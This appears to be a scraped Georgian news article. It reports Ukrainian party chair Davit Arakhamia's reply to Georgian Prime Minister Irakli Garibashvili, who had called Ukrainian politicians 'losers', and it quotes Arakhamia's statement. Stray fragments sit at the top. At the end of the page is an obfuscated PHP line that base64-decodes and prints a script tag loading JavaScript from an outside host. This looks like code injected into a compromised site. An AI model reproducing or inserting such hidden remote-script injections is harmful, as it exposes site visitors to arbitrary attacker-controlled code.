celsiusi
ავერსი შნაიდერი

რამდენიმე წუთის წინ უკრაინის მმართველი პარტიის „ხალხის მსახურის“ თავმჯდომარემ დავით არახამია საქართველოს პრემიერ-მინისტრის ირაკლი ღარიბაშვილის მიერ გაკეთებულ განცხადებებზე, რომლის თანახმად ღარიბაშვილმა უკრაინელი პოლიტიკოსები გააკრიტიკა და „ლუზერები“ უწოდა, მიმართვა გაავრცელა. 

„საქართველოს პრემიერ-მინისტრმა გაბრაზებულმა განაცხადა, რომ თითქოსდა უკრაინელი პოლიტიკოსები საქართველოს შიდა საქმეებში ერევიან. 
ვფიქრობ, რომ მთელ მსოფლიოს ესმის, რომ დემოკრატიის შენარჩუნება საქართველოში, რომლის ხელისუფლებაში სავსეა რუსეთის აგენტებით, მთელი მსოფლიო საზოგადოების მთავარი ამოცანაა.
ქართველ ხალხს ეს ესმის, საქართველოში ათიათასობით ახალგაზრდას ეს ესმის, პრემიერს კი  ვითომ ეს არ ესმის.
ვფიქრობ, ის დაიწყებს გაგაებას, როდესაც გამოქვეყნდება პრემიერ-მინისტრის ახლო წრეების ანგარიშები და ტრანზაქციები.
სამწუხაროა, მაგრამ საქართველოში ამის გამომძიებელი არავინ იქნება, რადგან „ხელი ხელს ბანს“.
და ბოლოს,  შეწყვიტეთ ქართველი ხალხის შეშინება, რომ უკრაინას სურს ომი საქართველოში. ჩვენ, როგორც არავის, გვესმის, რა არის ომი და ამას არავის ვურჩევთ რუსეთის გარდა.
უკრაინას სურს ევროკავშირში გაწევრიანება ქართველ ძმებთან ერთად და ძალიან მტკივნეულია იმის ყურება, თუ როგორ მიდის საქართველოს ხელისუფლება საპირისპირო მიმართულებით", - ნათქვამია გავრცელებულ განცხადებაში.

396
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");